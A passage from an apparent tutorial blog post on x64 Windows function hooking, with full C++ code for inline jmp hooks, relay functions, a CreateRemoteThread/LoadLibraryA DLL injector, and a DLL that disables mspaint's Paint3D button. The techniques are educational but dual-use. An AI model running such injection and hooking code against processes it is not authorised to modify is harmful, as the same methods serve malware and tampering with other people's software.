Notice that after the jmp instruction, we’re left with garbage. This is because the process of overwriting the first 5 bytes of AddColors() left a partial instruction in its wake. The first byte of the second instruction was overwritten, but the rest of the bytes are still there, and who knows what instructions those map to. That leaves the rest of the function in an unknown (and likely invalid) state. This doesn’t matter for the example, because the program is going to jump to ReturnRed() before it ever gets to the garbage we just created, but it’s important to keep in mind.
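
How much garbage gets left behind depends on the lengths of the instructions at the start of the function. As a rough illustration, the hypothetical helper below takes a list of instruction lengths (which a disassembler would normally supply) and reports how many instructions a 5 byte patch touches, and how many bytes of the last one are left dangling.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

struct ClobberInfo
{
  uint32_t instructionsHit; // instructions at least partially overwritten
  uint32_t danglingBytes;   // bytes of the last one that survive past the patch
};

// instructionSizes: lengths, in bytes, of the instructions at the start of the function
// (hypothetical helper and struct, for illustration only)
ClobberInfo CountClobbered(const std::vector<uint8_t>& instructionSizes, uint32_t patchSize = 5)
{
  uint32_t covered = 0;
  uint32_t hit = 0;
  for (uint8_t size : instructionSizes)
  {
    if (covered >= patchSize) break; // the patch ended on or before this instruction
    covered += size;
    ++hit;
  }

  uint32_t dangling = covered > patchSize ? covered - patchSize : 0;
  return { hit, dangling };
}
```

With two 4 byte instructions at the top of a function, CountClobbered({ 4, 4 }) reports 2 instructions hit and 3 dangling bytes. Those 3 bytes are the garbage. A function that happens to start with a single 5 byte instruction would leave none.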

We’ll write some hooks that preserve the hooked function’s original logic later in this post, so don’t worry about that too much right now. For our first example, we’ll build a program that destructively hooks a function, exactly like what’s shown in the diagram above (with some extra sauce to handle 64 bit code).

Example 1: Our First Function Hook

Let’s roll with the example code already provided and write a program that actually redirects program flow from AddColors() to ReturnRed(). The game plan here is to end up with a main() function that looks like this:

//both functions inside the same program as main()
Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right);
Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right);

int main()
{
  //install a hook in AddColors, going to ReturnRed
  InstallHook(AddColors, ReturnRed);

  Gdiplus::ARGB col =  AddColors(0x00000000, 0x000000FF);
  printf("%x\n", col); //will always be 0xFFFF0000
  return 0;
}

In a 32 bit program, the logic for InstallHook() can be implemented pretty much exactly how the diagram above suggests it would be:

void InstallHook(void* func2hook, void* payloadFunction)
{
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
    
  //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    
  //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
  //the payload function and the instruction immediately AFTER the jmp instruction
  const uint32_t relAddr = (uint32_t)payloadFunction - ((uint32_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);

  //install the hook
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

Things are a bit trickier in 64 bit, because functions can be located so far away from each other in memory that a 32 bit jmp instruction can’t jump that far, meaning that the 5 byte jump written by InstallHook() might be unable to reach the payload function from the hooked function.
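
A quick way to see the problem is to check whether the distance between two addresses fits in a signed 32 bit operand. This is a minimal sketch with a hypothetical helper name and made-up addresses, not code from the example programs.

```cpp
#include <cassert>
#include <cstdint>
#include <limits>

// true if a 5 byte E9 jump written at hookAddr can land on targetAddr
// (hypothetical helper, for illustration only)
bool IsReachableWithRel32(uint64_t hookAddr, uint64_t targetAddr)
{
  const int64_t jmpSize = 5;

  // the operand is relative to the end of the jmp instruction
  int64_t delta = static_cast<int64_t>(targetAddr)
                - (static_cast<int64_t>(hookAddr) + jmpSize);

  return delta >= std::numeric_limits<int32_t>::min()
      && delta <= std::numeric_limits<int32_t>::max();
}
```

Two functions a kilobyte apart pass this check easily, but something like IsReachableWithRel32(0x00007FF600000000, 0x00007FFB00000000) returns false, because those addresses are about 20GB apart and a rel32 operand only covers roughly 2GB in either direction.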

There’s no such thing as a 64 bit relative jmp instruction, so the next best option is to jmp to an address stored in a register, like the assembly shown below. Note that this snippet uses the r10 register because it’s one of the few volatile registers that isn’t used for passing function arguments in the Windows x64 calling convention (msdn link).

49 BA 00 04 00 00 00 00 00 00   mov        r10,400h  
41 FF E2                        jmp        r10

If we throw this in the beginning of hooked functions instead of the 5 byte jump from before, we’d limit the number of functions that we could hook to those with 13 or more bytes. That’s a significantly bigger limitation than our 32 bit code, so we’re instead going to write the bytes for this absolute jump somewhere in memory that’s close to the function we’re hooking. Then we’ll have the 5 byte jump we install in that function jump to this absolute jump, instead of straight to the payload function. Minhook refers to this absolute jump as the “relay function,” and I’m going to use that terminology as well.

Writing code to do this little dance is similar to the InstallHook() function shown above, but with a few more steps. The trickiest part of the process is allocating memory for the relay function that’s close enough to the target function to be reachable by a 5 byte jump. I’ve implemented logic for this in a function called AllocatePageNearAddress(). This function is a bit long, so I’ve included its implementation in the (expandable) box below, and omitted it from the sample code snippet immediately after that.

AllocatePageNearAddress() implementation (click to expand)

void* AllocatePageNearAddress(void* targetAddr)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
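  //clamp the search window to what a rel32 jump can reach, without underflowing near address 0
  uint64_t minAddr = max((startAddr > 0x7FFFFF00) ? startAddr - 0x7FFFFF00 : 0, (uint64_t)sysInfo.lpMinimumApplicationAddress);
  uint64_t maxAddr = min(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);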

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  uint8_t absJumpInstructions[] = 
  { 
    0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //mov r10, addr
    0x41, 0xFF, 0xE2 //jmp r10
  }; 

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* func2hook, void* payloadFunction)
{
    void* relayFuncMemory = AllocatePageNearAddress(func2hook);
    WriteAbsoluteJump64(relayFuncMemory, payloadFunction); //write relay func instructions

    //now that the relay function is built, we need to install the E9 jump into the target func,
    //this will jump to the relay function
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

    //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
    //the relay function and the instruction immediately AFTER the jmp instruction
    const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);

    //install the hook
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

With a bit of copy and paste magic, all the code snippets until now can be combined into our first example program. The end result is a small program that ends up calling ReturnRed() whenever we try to call AddColors(). The full code for this example is included in the expandable box below. Note that since this example creates x64 specific instructions for the relay function, it won’t work if it’s built as a 32 bit application. This will be the same for every example we build in this post.

Full Code For Example 1 (click to expand)

#include <Windows.h>
#include <stdint.h>
#include <stdio.h>
#include <memoryapi.h>

#include <gdiplus.h>
#pragma comment (lib, "Gdiplus.lib")
Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    uint32_t a = min(0xFF000000, (left & 0xFF000000) + (right & 0xFF000000));
    uint32_t r = min(0x00FF0000, (left & 0x00FF0000) + (right & 0x00FF0000));
    uint32_t g = min(0x0000FF00, (left & 0x0000FF00) + (right & 0x0000FF00));
    uint32_t b = min(0x000000FF, (left & 0x000000FF) + (right & 0x000000FF));

    return a | r | g | b;
}

Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    return 0xffff0000;
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
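    //clamp the search window to what a rel32 jump can reach, without underflowing near address 0
    uint64_t minAddr = max((startAddr > 0x7FFFFF00) ? startAddr - 0x7FFFFF00 : 0, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = min(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);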

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
        uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] =
    {
      0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //mov r10, addr
      0x41, 0xFF, 0xE2 //jmp r10
    };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* func2hook, void* payloadFunction)
{
    void* relayFuncMemory = AllocatePageNearAddress(func2hook);
    WriteAbsoluteJump64(relayFuncMemory, payloadFunction); //write relay func instructions

    //now that the relay function is built, we need to install the E9 jump into the target func,
    //this will jump to the relay function
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

    //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
    //the relay function and the instruction immediately AFTER the jmp instruction
    const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);

    //install the hook
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

int main()
{
    InstallHook(AddColors, ReturnRed);
    Gdiplus::ARGB col = AddColors(0xFF000000, 0x000000FF);
    printf("%x\n", col);
    return 0;
}
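
The offset arithmetic inside InstallHook() is the part that’s easiest to get subtly wrong, so here’s a minimal, platform-independent sketch of just that step. EncodeRelativeJump32() is a hypothetical helper (it isn’t part of the example project) that writes the 5 byte E9 jump into a plain buffer, and refuses to do so when the target can’t be reached with a 32 bit offset, which is something InstallHook() above simply assumes will never happen.

```cpp
#include <cstdint>

// Hypothetical helper, not part of the original example code.
// Encodes "jmp rel32" (opcode E9) as if it lived at address `from` and should land on `to`.
// Returns false if `to` is not reachable with a signed 32 bit displacement.
bool EncodeRelativeJump32(uint64_t from, uint64_t to, uint8_t out[5])
{
    // the displacement is measured from the END of the 5 byte jmp instruction
    const int64_t delta = (int64_t)(to - (from + 5));
    if (delta < INT32_MIN || delta > INT32_MAX)
        return false;

    const uint32_t rel32 = (uint32_t)(int32_t)delta;
    out[0] = 0xE9;
    for (int i = 0; i < 4; ++i)
        out[1 + i] = (uint8_t)(rel32 >> (8 * i)); // operand is stored little-endian
    return true;
}
```

For example, a jump installed at 0x1000 that should land on 0x2000 encodes as E9 FB 0F 00 00, because 0x2000 - 0x1005 = 0xFFB.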

This is all we need to know to start installing hooks in programs we have source access to, but there’s an annoying gap between that and being able to hook a running instance of a program. We’ll bridge that gap with the next example.

Example 2: Hooking Functions in a Running Program

The second example program we’re going to build will disable the “Edit With Paint3D” button in a running instance of mspaint.exe.

There are 2 new hurdles we have to overcome in order to install a hook in a running program: getting the target program to execute our hooking logic, and figuring out the address of the function we want to hook. We’ll tackle these in order.

Our mission is to keep the Paint3D button from accomplishing its mission.

Getting Code Into a Running Process

The simplest way to get an arbitrary process to execute hooking logic is to build that logic into a DLL and use DLL injection to get that code into the target process’ memory.

The nuts and bolts of how DLL injection works are beyond the scope of this blog post, but if you want to learn more, check out this article. I’ve included the code for a basic DLL injection program in the collapsible box below. This is the code that the example program will use to inject its dll into mspaint.exe.

Full DLL Injection Code (click to expand)

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
  printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
  HANDLE handle = OpenProcess(
    PROCESS_QUERY_INFORMATION | //Needed to get a process' token
    PROCESS_CREATE_THREAD |    //for obvious reasons
    PROCESS_VM_OPERATION |    //required to perform operations on address space of process (like WriteProcessMemory)
    PROCESS_VM_WRITE,  //required for WriteProcessMemory
    FALSE,      //don't inherit handle
    processID);

  if (handle == NULL)
  {
    fprintf(stderr, "Could not open process with pid: %lu\n", processID);
    return;
  }

  //once the process is open, we need to write the name of our dll to that process' memory
  size_t dllPathLen = strlen(dllPath) + 1; //+1 so the null terminator is copied into the remote process too
  void* dllPathRemote = VirtualAllocEx(
    handle,
    NULL, //let the system decide where to allocate the memory
    dllPathLen,
    MEM_COMMIT, //actually commit the virtual memory
    PAGE_READWRITE); //mem access for committed page
  
  if (!dllPathRemote)
  {
    fprintf(stderr, "Could not allocate %zu bytes in process with pid: %lu\n", dllPathLen, processID);
    return;
  }

  BOOL writeSucceeded = WriteProcessMemory(
    handle,
    dllPathRemote,
    dllPath,
    dllPathLen,
    NULL);
  
  if (!writeSucceeded)
  {
    fprintf(stderr, "Could not write %zu bytes to process with pid %lu\n", dllPathLen, processID);
    return;
  }

  //now get address of LoadLibraryA function inside Kernel32.dll
  //TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
  PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
  if (loadLibraryFunc == NULL)
  {
    fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
    return;
  }

  //now create a thread in remote process that loads our target dll using LoadLibraryA

  HANDLE remoteThread = CreateRemoteThread(
    handle,
    NULL, //default thread security
    0, //stack size for thread
    loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
    dllPathRemote, //pointer to variable being passed to thread function
    0, //0 means the thread runs immediately after creation
    NULL); //we don't care about getting back the thread identifier

  if (remoteThread == NULL)
  {
    fprintf(stderr, "Could not create remote thread.\n");
    return;
  }
  else
  {
    fprintf(stdout, "Success! remote thread started in process %lu\n", processID);
  }

  // Wait for the remote thread to terminate
  WaitForSingleObject(remoteThread, INFINITE);

  //once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
  VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
  CloseHandle(remoteThread);
  CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
  HANDLE h;
  PROCESSENTRY32 singleProcess;
  h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
    TH32CS_SNAPPROCESS, //get all processes
    0); //ignored for SNAPPROCESS

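  singleProcess.dwSize = sizeof(PROCESSENTRY32);

  //Process32First fills in the first entry; Process32Next only works after it has been called
  if (!Process32First(h, &singleProcess))
  {
    CloseHandle(h);
    return 0;
  }

  do {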

    if (strcmp(singleProcess.szExeFile, name) == 0)
    {
      DWORD pid = singleProcess.th32ProcessID;
      printf("PID Found: %lu\n", pid);
      CloseHandle(h);
      return pid;
    }

  } while (Process32Next(h, &singleProcess));

  CloseHandle(h);

  return 0;
}

int main(int argc, const char** argv)
{
  if (argc != 3)
  {
    printHelp();
    return 1; //don't touch argv[1] / argv[2] if they weren't provided
  }

  createRemoteThread(findPidByName(argv[1]), argv[2]);

  return 0;
}

The code for the dll we’re going to inject is basically identical to the last example except that main() will be replaced by DllMain(), and we need to do some extra work to get a pointer to the function we want to hook. With those concerns in mind, the skeleton of Example 2’s dll looks like this:

//source for a hooking dll that will be injected into mspaint.exe

#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>

void* AllocatePageNearAddress(void* targetAddr)
{
  //same as before
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  //same as before
}

void InstallHook(void* func2hook, void* payloadFunction)
{
  //same as before
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(0x0, 0x0); //we'll fill this in later
  }
  return true;
}

What Function Do We Need to Hook?

Since our goal is to disable the “Edit With Paint3D” button, we need to find the mspaint.exe function that handles that button press. We know that the “Edit With Paint3D” button eventually launches a Paint3D process, so we can be reasonably sure that a function like CreateProcessA() or OpenProcess() gets called at some point during the button handling function. Blindly hooking either of these functions and redirecting them to an empty function doesn’t work (I tried), but throwing some breakpoints on them is as good a place to start as any.

If we look at the functions imported by mspaint in a debugger (like x64dbg), we can see that it is in fact importing OpenProcess(), so our first step is to throw a breakpoint there and then see what happens when we press the paint3d button.

It turns out that our breakpoint does get hit in response to the button click, which is fantastic. If we switch over to the callstack view while we’re stopped at the breakpoint, we can see a couple of mspaint.exe functions much higher up in the stack. The highest of these in the callstack is a good candidate for the button handler function we’re after.

Going to the address shown for that function brings us into the middle of a function body. What we’re after is the relative virtual address (RVA) of the beginning of this function. x64dbg makes this really easy. All we need to do is scroll up until we find the first instruction for the function, then right click on the address of that instruction and select “Copy->RVA.” In my version of mspaint.exe, the RVA of this function is 0x4AA40.

I’m going to save us some trial and error here and reveal that 0x4AA40 ends up not being the address we need. The real button handler runs on a different thread. Hooking 0x4AA40 and redirecting it to an empty function disables the Paint3D button, but only if the current document is empty.

I wish I had a better procedure to share, but my next step after realizing the above was to retry the same procedure except draw something in paint before I clicked the Paint3D button. The callstack I got then had a number of calls inside uiribbon.dll, and the highest mspaint.exe function in that stack ended up being the button handler. Its RVA was 0x6C6F0.

Turning an RVA Into a Runtime Memory Address

RVAs are addresses which are relative to the base address of the module they’re located in. Since programs (and individual modules, thanks to ASLR) can be loaded into memory at different locations across multiple runs of the same program, having the RVA of a function means that we can reliably get that function’s address, no matter where the process is loaded in memory.
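
As a quick illustration of that arithmetic, here’s a tiny sketch. The helper names and the base addresses in the note underneath are made up for the example; only the RVA 0x6C6F0 comes from the debugging session above.

```cpp
#include <cstdint>

// Hypothetical helpers, for illustration only.
// An RVA is just "runtime address minus module base", so converting
// in either direction is a single add or subtract.
uint64_t RvaToAddress(uint64_t moduleBase, uint64_t rva)
{
    return moduleBase + rva;
}

uint64_t AddressToRva(uint64_t moduleBase, uint64_t address)
{
    return address - moduleBase;
}
```

If the module happened to load at 0x00007FF6A0000000 on one run and at 0x00007FF7C5510000 on the next, the same RVA would resolve to 0x00007FF6A006C6F0 and 0x00007FF7C557C6F0 respectively.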

In this case, our target function is implemented inside the base module of the process (since it isn’t imported from a dll), so we need to find the base address of the mspaint.exe module. We can do this with the function below.

uint64_t GetBaseModuleForProcess()
{
  HANDLE process = GetCurrentProcess();
  HMODULE processModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  EnumProcessModules(process, processModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR processName[256];
  GetModuleFileNameEx(process, NULL, processName, 256); //a null module handle gets the process name
  _strlwr_s(processName, 256);

  HMODULE module = 0; //An HMODULE is the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, processModules[i], moduleName, 256);

    _fullpath(absoluteModuleName, moduleName, 256);
    _strlwr_s(absoluteModuleName, 256);

    if (strcmp(processName, absoluteModuleName) == 0)
    {
      module = processModules[i];
      break;
    }
  }

  return (uint64_t)module;
}

HMODULEs are actually pointers to the location of a module in memory, so the cast to a uint64_t in the above example is mostly for convenience. In order to get the address of our target function, we’ll need to add the function’s RVA to this base module address.

void* GetFunc2HookAddr()
{
    uint64_t functionRVA = 0x6C6F0;
    uint64_t func2HookAddr = GetBaseModuleForProcess() + functionRVA;
    return (void*)func2HookAddr;
}

If we were hooking a function that was imported from a dll, we’d need to modify the GetBaseModuleForProcess() function to let us specify the name of the module that we were after, rather than being hardcoded to find the base. We’ll do this in the fourth example in this post, but you can also see an example of this in the code for my hooking-by-example repo here.

Putting It All Together

Now that we have a function to hook, all we need to do is redirect it to an empty payload function to disable it. This is as straightforward as it sounds:

int NullPaint3DButtonHandler()
{
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(GetFunc2HookAddr(), NullPaint3DButtonHandler);
  }
  return true;
}

We got a bit lucky here because the button handling function doesn’t have a significant return value (or at least, returning 0 from it is valid). The smart way to approach this would probably be to spend some time in the debugger really understanding what this button handling function does, so that we could write a payload that we knew wasn’t going to break anything, but sometimes it’s better to be lucky than smart.

All we need to do to finish things off is add the implementation for GetFunc2HookAddr() and the payload function into our example dll. The end result is a dll that disables the “Edit with Paint3D” button when injected into mspaint, exactly as we planned. The full source for this example is in the collapsible box below.

Full Code for Example 2 (click to expand)

#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>

void* AllocatePageNearAddress(void* targetAddr)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
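  //clamp the +/- 2GB search window to the range of addresses the process is allowed to use
  uint64_t lowBound = (startAddr > 0x7FFFFF00) ? startAddr - 0x7FFFFF00 : 0;
  uint64_t minAddr = max(lowBound, (uint64_t)sysInfo.lpMinimumApplicationAddress);
  uint64_t maxAddr = min(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);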

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}

uint64_t GetBaseModuleForProcess()
{
  HANDLE process = GetCurrentProcess();
  HMODULE processModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  EnumProcessModules(process, processModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR processName[256];
  GetModuleFileNameEx(process, NULL, processName, 256); //a null module handle gets the process name
  _strlwr_s(processName, 256);

  HMODULE module = 0; //An HMODULE is the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, processModules[i], moduleName, 256);

    _fullpath(absoluteModuleName, moduleName, 256);
    _strlwr_s(absoluteModuleName, 256);

    if (strcmp(processName, absoluteModuleName) == 0)
    {
      module = processModules[i];
      break;
    }
  }

  return (uint64_t)module;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
            0x41, 0xFF, 0xE2 };

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* func2hook, void* payloadFunction)
{
  void* relayFuncMemory = AllocatePageNearAddress(func2hook);
  WriteAbsoluteJump64(relayFuncMemory, payloadFunction); //write relay func instructions

  //now that the relay function is built, we need to install the E9 jump into the target func,
  //this will jump to the relay function
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);

  //install the hook
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

void* GetFunc2HookAddr()
{
  uint64_t functionRVA = 0x6C6F0; 
  uint64_t func2HookAddr = GetBaseModuleForProcess() + functionRVA;
  return (void*)func2HookAddr;
}

int NullPaint3DButtonHandler()
{
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(GetFunc2HookAddr(), NullPaint3DButtonHandler);
  }
  return true;
}

Function Hooking for Big Kids

The previous examples technically hooked a couple functions, but did so at the cost of destroying their original functionality. This meant that we couldn’t do things like modify function arguments being passed to the original functions, or add logging while preserving the original logic of the hooked programs. Real function hooking doesn’t have to make this trade, and our next two examples won’t either.

So far, the hooks we’ve created have had 3 parts: the hooked function, the relay function, and the hook payload. Now we need to add another step in this process, called a trampoline. With this new step, our hook process looks like this:

Rather than simply replace the initial instructions in the hooked function, we’re going to use those instructions to build a trampoline that we can call from a payload function when we want to execute the original version of the hooked function. A hook payload that uses a trampoline might look like this:

Gdiplus::ARGB(*AddColorsTrampoline)(Gdiplus::ARGB left, Gdiplus::ARGB right);
Gdiplus::ARGB AddColorHookPayload(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
  //perform some new action
  printf("Hook executed\n");

  //replace one of the arguments being used to call
  //the hooked function
  return AddColorsTrampoline(0xFFFF0000, right);
}

At a super high level, trampolines need to do two things:

Execute the instructions that were overwritten when the hook jmp was installed in the hooked function.
Jump back to the body of the hooked function AFTER the installed jump instruction, so that the rest of the function can continue like normal.

The first item on this list is really easy to get working for contrived cases, but really difficult to get right for real world use. Consider the following assembly (shown with the addresses of the instructions on the left):

EasyCase:
00007FF7F2691FF0    48 89 4C 24 08       mov         qword ptr [rsp+8],rcx  
00007FF7F2691FF5    55                   push        rbp  
00007FF7F2691FF6    57                   push        rdi  
00007FF7F2691FF7    48 81 EC 08 01 00 00 sub         rsp,108h  
00007FF7F2691FFE    48 8D 6C 24 20       lea         rbp,[rsp+20h]  
        [Rest of function omitted]

This is an example of the “easy” case for creating a trampoline. The first 5 bytes of the function belong to one instruction, and that instruction doesn’t rely on any rip-relative addressing. All we need to do to make a trampoline for this function is copy the first 5 bytes to a buffer before we overwrite them with our hook, and then add a jump to 00007FF7F2691FF5 (the address of the first instruction we didn’t overwrite) immediately after it. In assembly, this might look like this:

Trampoline:
48 89 4C 24 08                  mov         qword ptr [rsp+8],rcx  
49 BA F5 1F 69 F2 F7 7F 00 00   mov         r10,7FF7F2691FF5h  
41 FF E2                        jmp         r10
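
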